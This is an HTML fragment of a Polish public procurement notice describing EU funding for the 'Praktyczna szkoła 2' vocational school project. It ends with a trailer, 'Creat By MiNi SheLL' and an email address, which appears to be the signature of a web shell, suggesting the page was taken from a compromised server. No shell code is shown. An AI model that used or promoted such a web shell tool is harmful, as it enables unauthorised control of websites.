<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Praktyczna szkoła 2 jest realizowany w ramach Programu Operacyjnego Kapitał Ludzki - Priorytet IX - Rozwój wykształcenia i kompetencji 
w regionach, Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com